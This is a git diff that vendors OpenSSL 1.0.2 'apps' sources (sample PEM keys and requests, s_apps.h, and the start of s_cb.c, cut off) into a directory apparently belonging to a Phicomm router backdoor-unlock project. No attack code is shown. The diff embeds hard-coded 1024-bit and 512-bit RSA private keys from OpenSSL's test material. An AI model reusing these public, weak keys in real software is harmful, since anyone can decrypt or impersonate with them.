zyAOU+KTU89qdv0;zl!MR6Cb>HNgprKQ=ip@&mj5^;!{WX?L<G5@Oy~9p78Gxy+QaR
zM2~BK*-rikYbaws;I{+G4-@@Og#VfF6@<S_INqzJ&ndyx{ya<gETSKW4S|HamGF~3
z69iX%CJ{Y;yO8>8i2iEA%ZVPpiAeo2qNn4vlJMC?-$Hz7J2wzL^$8I@ZD$wJHxhrF
z=;?ECfar^femBw6^ZE(V)Asy|@Dk$l1o5Hg^%T)lpXZ34p4SngUrqdv5<NXH{KGXS
z+%>^Zj?0I{XAa@#h#ubor2gW3C_ut_LiLvkj$u?kk8u3PC4H_ZKJ<K-5I&daeZ+_M
z+bY6ah`xvLwS?n83t+-_u7jU!&+~+@C;T<SZzlXL!PV>K1mXBCQu=3z4{iTxqNn}v
z1<})Sze0TS!1m)inDn0`xZ0j;h@Sc^Bm7q4Q%Cp)!W#+SNceifZzFsY;X%T?2;W5b
z9U4BU;Xf2yJ>Q22pGW+EMto@hKTh<t|9?aHH;K<P8lM-5p86ai9N*RDcpcUF94C6}
z^H;*JB|h(Kd`=NP_4$nOGU9Vq<C7!)RG{|rMTC2Z&qTp-e$sxvoakwLW)OZI@hQ>x
zTub!Sr;_k;;<H%e<0X3PV-ao=p9YQ3TB4^u8wsx<K4Fc|7NVy<3BoIh&vuOu{`VXv
zb-cbqcoo#kdALjC^L?VH?Rk*!`NZd^8lT6Ap8D(|{CeW^JB`otL{EJV5{`enk>~ZQ
z#^;YjPkr7bd?E39Pves+01+gd=OOsX;~J31g#C}dk>p8k@3KRinFl_cIQtHnOGG+D
z9y`)wGfx=)^3FV)lS$@D#Ib;K(*xgzTH{?^kr+r~aXaFHKXsPzF9D+59!q(;6ZqG9
zdpm@pVWcD2mI!r4Mq2PcWekYMC7!rVjCfUxoczu%E5ve87TI*jVP92`5GV7x^9Mk-
z8yB&VaE*?!qI>yT3Hcns#cM4ho{mVN1Y)lqAMcqc{cq#(UVxr>Ez=~A|E6Lrk1zMt
z5QKTWH_`Mceq?}z&jy-goZREuLFTFMbrDY)=2b1eyWmtFGbf=e;|<8uq;~7=P>G&u
z{HNmhy)+o|YJ4ZKY~#NPAJUL;O^gZ0|04Lwc*(OJ8};22a0~s4L6ERHi{YonW3@6w
gKp1-n7yFRPl}fe$E(MJu;c-2p{omrH(Ty7aZ~Qgr(*OVf

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/s1024key.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/s1024key.pem
new file mode 100644
index 0000000..19e0403
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/s1024key.pem
@@ -0,0 +1,15 @@
+-----BEGIN RSA PRIVATE KEY-----
+MIICXgIBAAKBgQCzEfU8E+ZGTGtHXV5XhvM2Lg32fXUIjydXb34BGVPX6oN7+aNV
+S9eWayvW/+9/vUb0aCqilJrpFesgItV2T8VhhjOE++XUz46uNpcMU7wHMEAXUufP
+pztpFm8ZEk2tFKvadkSSoN8lb11juvZVkSkPlB65pFhSe4QKSp6J4HrkYwIDAQAB
+AoGBAKy8jvb0Lzby8q11yNLf7+78wCVdYi7ugMHcYA1JVFK8+zb1WfSm44FLQo/0
+dSChAjgz36TTexeLODPYxleJndjVcOMVzsLJjSM8dLpXsTS4FCeMbhw2s2u+xqKY
+bbPWfk+HOTyJjfnkcC5Nbg44eOmruq0gSmBeUXVM5UntlTnxAkEA7TGCA3h7kx5E
+Bl4zl2pc3gPAGt+dyfk5Po9mGJUUXhF5p2zueGmYWW74TmOWB1kzt4QRdYMzFePq
+zfDNXEa1CwJBAMFErdY0xp0UJ13WwBbUTk8rujqQdHtjw0klhpbuKkjxu2hN0wwM
+6p0D9qxF7JHaghqVRI0fAW/EE0OzdHMR9QkCQQDNR26dMFXKsoPu+vItljj/UEGf
+QG7gERiQ4yxaFBPHgdpGo0kT31eh9x9hQGDkxTe0GNG/YSgCRvm8+C3TMcKXAkBD
+dhGn36wkUFCddMSAM4NSJ1VN8/Z0y5HzCmI8dM3VwGtGMUQlxKxwOl30LEQzdS5M
+0SWojNYXiT2gOBfBwtbhAkEAhafl5QEOIgUz+XazS/IlZ8goNKdDVfYgK3mHHjvv
+nY5G+AuGebdNkXJr4KSWxDcN+C2i47zuj4QXA16MAOandA==
+-----END RSA PRIVATE KEY-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/s1024req.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/s1024req.pem
new file mode 100644
index 0000000..bb75e7e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/s1024req.pem
@@ -0,0 +1,11 @@
+-----BEGIN CERTIFICATE REQUEST-----
+MIIBojCCAQsCAQAwZDELMAkGA1UEBhMCQVUxEzARBgNVBAgTClF1ZWVuc2xhbmQx
+GjAYBgNVBAoTEUNyeXB0U29mdCBQdHkgTHRkMSQwIgYDVQQDExtTZXJ2ZXIgdGVz
+dCBjZXJ0ICgxMDI0IGJpdCkwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBALMR
+9TwT5kZMa0ddXleG8zYuDfZ9dQiPJ1dvfgEZU9fqg3v5o1VL15ZrK9b/73+9RvRo
+KqKUmukV6yAi1XZPxWGGM4T75dTPjq42lwxTvAcwQBdS58+nO2kWbxkSTa0Uq9p2
+RJKg3yVvXWO69lWRKQ+UHrmkWFJ7hApKnongeuRjAgMBAAEwDQYJKoZIhvcNAQEE
+BQADgYEAStHlk4pBbwiNeQ2/PKTPPXzITYC8Gn0XMbrU94e/6JIKiO7aArq9Espq
+nrBSvC14dHcNl6NNvnkEKdQ7hAkcACfBbnOXA/oQvMBd4GD78cH3k0jVDoVUEjil
+frLfWlckW6WzpTktt0ZPDdAjJCmKVh0ABHimi7Bo9FC3wIGIe5M=
+-----END CERTIFICATE REQUEST-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/s512-key.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/s512-key.pem
new file mode 100644
index 0000000..0e3ff2d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/s512-key.pem
@@ -0,0 +1,9 @@
+-----BEGIN RSA PRIVATE KEY-----
+MIIBPAIBAAJBAJ+zw4Qnlf8SMVIPFe9GEcStgOY2Ww/dgNdhjeD8ckUJNP5VZkVD
+TGiXav6ooKXfX3j/7tdkuD8Ey2//Kv7+ue0CAwEAAQJAN6W31vDEP2DjdqhzCDDu
+OA4NACqoiFqyblo7yc2tM4h4xMbC3Yx5UKMN9ZkCtX0gzrz6DyF47bdKcWBzNWCj
+gQIhANEoojVt7hq+SQ6MCN6FTAysGgQf56Q3TYoJMoWvdiXVAiEAw3e3rc+VJpOz
+rHuDo6bgpjUAAXM+v3fcpsfZSNO6V7kCIQCtbVjanpUwvZkMI9by02oUk9taki3b
+PzPfAfNPYAbCJQIhAJXNQDWyqwn/lGmR11cqY2y9nZ1+5w3yHGatLrcDnQHxAiEA
+vnlEGo8K85u+KwIOimM48ZG8oTk7iFdkqLJR1utT3aU=
+-----END RSA PRIVATE KEY-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/s512-req.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/s512-req.pem
new file mode 100644
index 0000000..ea314be
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/s512-req.pem
@@ -0,0 +1,8 @@
+-----BEGIN CERTIFICATE REQUEST-----
+MIIBGzCBxgIBADBjMQswCQYDVQQGEwJBVTETMBEGA1UECBMKUXVlZW5zbGFuZDEa
+MBgGA1UEChMRQ3J5cHRTb2Z0IFB0eSBMdGQxIzAhBgNVBAMTGlNlcnZlciB0ZXN0
+IGNlcnQgKDUxMiBiaXQpMFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJ+zw4Qnlf8S
+MVIPFe9GEcStgOY2Ww/dgNdhjeD8ckUJNP5VZkVDTGiXav6ooKXfX3j/7tdkuD8E
+y2//Kv7+ue0CAwEAATANBgkqhkiG9w0BAQQFAANBAAB+uQi+qwn6qRSHB8EUTvsm
+5TNTHzYDeN39nyIbZNX2s0se3Srn2Bxft5YCwD3moFZ9QoyDHxE0h6qLX5yjD+8=
+-----END CERTIFICATE REQUEST-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/s_apps.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/s_apps.h
new file mode 100644
index 0000000..5b54bfd
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/s_apps.h
@@ -0,0 +1,211 @@
+/* apps/s_apps.h */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2001 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+/* conflicts with winsock2 stuff on netware */
+#if !defined(OPENSSL_SYS_NETWARE)
+# include <sys/types.h>
+#endif
+#include <openssl/opensslconf.h>
+
+#if defined(OPENSSL_SYS_WINDOWS) || defined(OPENSSL_SYS_MSDOS)
+# include <conio.h>
+#endif
+
+#if defined(OPENSSL_SYS_MSDOS) && !defined(_WIN32)
+# define _kbhit kbhit
+#endif
+
+#if defined(OPENSSL_SYS_VMS) && !defined(FD_SET)
+/*
+ * VAX C does not defined fd_set and friends, but it's actually quite simple
+ */
+/* These definitions are borrowed from SOCKETSHR.       /Richard Levitte */
+# define MAX_NOFILE      32
+# define NBBY             8     /* number of bits in a byte */
+
+# ifndef FD_SETSIZE
+#  define FD_SETSIZE      MAX_NOFILE
+# endif                         /* FD_SETSIZE */
+
+/* How many things we'll allow select to use. 0 if unlimited */
+# define MAXSELFD        MAX_NOFILE
+typedef int fd_mask;            /* int here! VMS prototypes int, not long */
+# define NFDBITS (sizeof(fd_mask) * NBBY)/* bits per mask (power of 2!) */
+# define NFDSHIFT 5             /* Shift based on above */
+
+typedef fd_mask fd_set;
+# define FD_SET(n, p)    (*(p) |= (1 << ((n) % NFDBITS)))
+# define FD_CLR(n, p)    (*(p) &= ~(1 << ((n) % NFDBITS)))
+# define FD_ISSET(n, p)  (*(p) & (1 << ((n) % NFDBITS)))
+# define FD_ZERO(p)      memset((char *)(p), 0, sizeof(*(p)))
+#endif
+
+#define PORT            4433
+#define PORT_STR        "4433"
+#define PROTOCOL        "tcp"
+
+int do_server(int port, int type, int *ret,
+              int (*cb) (char *hostname, int s, int stype,
+                         unsigned char *context), unsigned char *context,
+              int naccept);
+#ifdef HEADER_X509_H
+int MS_CALLBACK verify_callback(int ok, X509_STORE_CTX *ctx);
+#endif
+#ifdef HEADER_SSL_H
+int set_cert_stuff(SSL_CTX *ctx, char *cert_file, char *key_file);
+int set_cert_key_stuff(SSL_CTX *ctx, X509 *cert, EVP_PKEY *key,
+                       STACK_OF(X509) *chain, int build_chain);
+int ssl_print_sigalgs(BIO *out, SSL *s);
+int ssl_print_point_formats(BIO *out, SSL *s);
+int ssl_print_curves(BIO *out, SSL *s, int noshared);
+#endif
+int ssl_print_tmp_key(BIO *out, SSL *s);
+int init_client(int *sock, char *server, int port, int type);
+int should_retry(int i);
+int extract_port(char *str, short *port_ptr);
+int extract_host_port(char *str, char **host_ptr, unsigned char *ip,
+                      short *p);
+
+long MS_CALLBACK bio_dump_callback(BIO *bio, int cmd, const char *argp,
+                                   int argi, long argl, long ret);
+
+#ifdef HEADER_SSL_H
+void MS_CALLBACK apps_ssl_info_callback(const SSL *s, int where, int ret);
+void MS_CALLBACK msg_cb(int write_p, int version, int content_type,
+                        const void *buf, size_t len, SSL *ssl, void *arg);
+void MS_CALLBACK tlsext_cb(SSL *s, int client_server, int type,
+                           unsigned char *data, int len, void *arg);
+#endif
+
+int MS_CALLBACK generate_cookie_callback(SSL *ssl, unsigned char *cookie,
+                                         unsigned int *cookie_len);
+int MS_CALLBACK verify_cookie_callback(SSL *ssl, unsigned char *cookie,
+                                       unsigned int cookie_len);
+
+typedef struct ssl_excert_st SSL_EXCERT;
+
+void ssl_ctx_set_excert(SSL_CTX *ctx, SSL_EXCERT *exc);
+void ssl_excert_free(SSL_EXCERT *exc);
+int args_excert(char ***pargs, int *pargc,
+                int *badarg, BIO *err, SSL_EXCERT **pexc);
+int load_excert(SSL_EXCERT **pexc, BIO *err);
+void print_ssl_summary(BIO *bio, SSL *s);
+#ifdef HEADER_SSL_H
+int args_ssl(char ***pargs, int *pargc, SSL_CONF_CTX *cctx,
+             int *badarg, BIO *err, STACK_OF(OPENSSL_STRING) **pstr);
+int args_ssl_call(SSL_CTX *ctx, BIO *err, SSL_CONF_CTX *cctx,
+                  STACK_OF(OPENSSL_STRING) *str, int no_ecdhe, int no_jpake);
+int ssl_ctx_add_crls(SSL_CTX *ctx, STACK_OF(X509_CRL) *crls,
+                     int crl_download);
+int ssl_load_stores(SSL_CTX *ctx, const char *vfyCApath,
+                    const char *vfyCAfile, const char *chCApath,
+                    const char *chCAfile, STACK_OF(X509_CRL) *crls,
+                    int crl_download);
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/s_cb.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/s_cb.c
new file mode 100644
index 0000000..d5756c0
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/s_cb.c
@@ -0,0 +1,1646 @@
+/* apps/s_cb.c - callback functions used by s_client, s_server, and s_time */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#define USE_SOCKETS
+#define NON_MAIN
+#include "apps.h"
+#undef NON_MAIN
+#undef USE_SOCKETS
+#include <openssl/err.h>
+#include <openssl/rand.h>
+#include <openssl/x509.h>
+#include <openssl/ssl.h>
+#include "s_apps.h"
+
+#define COOKIE_SECRET_LENGTH    16
+
+int verify_depth = 0;
+int verify_quiet = 0;
+int verify_error = X509_V_OK;
+int verify_return_error = 0;
+unsigned char cookie_secret[COOKIE_SECRET_LENGTH];
+int cookie_initialized = 0;
+
+int MS_CALLBACK verify_callback(int ok, X509_STORE_CTX *ctx)
+{
+    X509 *err_cert;
+    int err, depth;
+
+    err_cert = X509_STORE_CTX_get_current_cert(ctx);
+    err = X509_STORE_CTX_get_error(ctx);
+    depth = X509_STORE_CTX_get_error_depth(ctx);
+
+    if (!verify_quiet || !ok) {
+        BIO_printf(bio_err, "depth=%d ", depth);
+        if (err_cert) {
+            X509_NAME_print_ex(bio_err,
+                               X509_get_subject_name(err_cert),
+                               0, XN_FLAG_ONELINE);
+            BIO_puts(bio_err, "\n");
+        } else
+            BIO_puts(bio_err, "<no cert>\n");
+    }
+    if (!ok) {
+        BIO_printf(bio_err, "verify error:num=%d:%s\n", err,
+                   X509_verify_cert_error_string(err));
+        if (verify_depth >= depth) {
+            if (!verify_return_error)
+                ok = 1;
+            verify_error = X509_V_OK;
+        } else {
+            ok = 0;
+            verify_error = X509_V_ERR_CERT_CHAIN_TOO_LONG;
+        }
+    }
+    switch (err) {
+    case X509_V_ERR_UNABLE_TO_GET_ISSUER_CERT:
+        BIO_puts(bio_err, "issuer= ");
+        X509_NAME_print_ex(bio_err, X509_get_issuer_name(err_cert),
+                           0, XN_FLAG_ONELINE);
+        BIO_puts(bio_err, "\n");
+        break;
+    case X509_V_ERR_CERT_NOT_YET_VALID:
+    case X509_V_ERR_ERROR_IN_CERT_NOT_BEFORE_FIELD:
+        BIO_printf(bio_err, "notBefore=");
+        ASN1_TIME_print(bio_err, X509_get_notBefore(err_cert));
+        BIO_printf(bio_err, "\n");
+        break;
+    case X509_V_ERR_CERT_HAS_EXPIRED:
+    case X509_V_ERR_ERROR_IN_CERT_NOT_AFTER_FIELD:
+        BIO_printf(bio_err, "notAfter=");
+        ASN1_TIME_print(bio_err, X509_get_notAfter(err_cert));
+        BIO_printf(bio_err, "\n");
+        break;
+    case X509_V_ERR_NO_EXPLICIT_POLICY:
+        if (!verify_quiet)
+            policies_print(bio_err, ctx);
+        break;
+    }
+    if (err == X509_V_OK && ok == 2 && !verify_quiet)
+        policies_print(bio_err, ctx);
+    if (ok && !verify_quiet)
+        BIO_printf(bio_err, "verify return:%d\n", ok);
+    return (ok);
+}
+
+int set_cert_stuff(SSL_CTX *ctx, char *cert_file, char *key_file)
+{
+    if (cert_file != NULL) {
+        /*-
+        SSL *ssl;
+        X509 *x509;
+        */
+
+        if (SSL_CTX_use_certificate_file(ctx, cert_file,
+                                         SSL_FILETYPE_PEM) <= 0) {
+            BIO_printf(bio_err, "unable to get certificate from '%s'\n",
+                       cert_file);
+            ERR_print_errors(bio_err);
+            return (0);
+        }
+        if (key_file == NULL)
+            key_file = cert_file;
+        if (SSL_CTX_use_PrivateKey_file(ctx, key_file, SSL_FILETYPE_PEM) <= 0) {
+            BIO_printf(bio_err, "unable to get private key from '%s'\n",
+                       key_file);
+            ERR_print_errors(bio_err);
+            return (0);
+        }
+
+        /*-
+        In theory this is no longer needed
+        ssl=SSL_new(ctx);
+        x509=SSL_get_certificate(ssl);
+
+        if (x509 != NULL) {
+                EVP_PKEY *pktmp;
+                pktmp = X509_get_pubkey(x509);
+                EVP_PKEY_copy_parameters(pktmp,
+                                        SSL_get_privatekey(ssl));
+                EVP_PKEY_free(pktmp);
+        }
+        SSL_free(ssl);
+        */
+
+        /*
+         * If we are using DSA, we can copy the parameters from the private
+         * key
+         */
+
+        /*
+         * Now we know that a key and cert have been set against the SSL
+         * context
+         */
+        if (!SSL_CTX_check_private_key(ctx)) {
+            BIO_printf(bio_err,
+                       "Private key does not match the certificate public key\n");
+            return (0);
+        }
+    }
+    return (1);
+}
+
+int set_cert_key_stuff(SSL_CTX *ctx, X509 *cert, EVP_PKEY *key,
+                       STACK_OF(X509) *chain, int build_chain)
+{
+    int chflags = chain ? SSL_BUILD_CHAIN_FLAG_CHECK : 0;
+    if (cert == NULL)
+        return 1;
+    if (SSL_CTX_use_certificate(ctx, cert) <= 0) {
+        BIO_printf(bio_err, "error setting certificate\n");
+        ERR_print_errors(bio_err);
+        return 0;
+    }
+
+    if (SSL_CTX_use_PrivateKey(ctx, key) <= 0) {
+        BIO_printf(bio_err, "error setting private key\n");
+        ERR_print_errors(bio_err);
+        return 0;
+    }
+
+    /*
+     * Now we know that a key and cert have been set against the SSL context
+     */
+    if (!SSL_CTX_check_private_key(ctx)) {
+        BIO_printf(bio_err,
+                   "Private key does not match the certificate public key\n");
+        return 0;
+    }
+    if (chain && !SSL_CTX_set1_chain(ctx, chain)) {
+        BIO_printf(bio_err, "error setting certificate chain\n");
+        ERR_print_errors(bio_err);
+        return 0;
+    }
+    if (build_chain && !SSL_CTX_build_cert_chain(ctx, chflags)) {
+        BIO_printf(bio_err, "error building certificate chain\n");
+        ERR_print_errors(bio_err);
+        return 0;
+    }
+    return 1;
+}
+
+static void ssl_print_client_cert_types(BIO *bio, SSL *s)
+{
+    const unsigned char *p;
+    int i;
+    int cert_type_num = SSL_get0_certificate_types(s, &p);
+    if (!cert_type_num)
+        return;
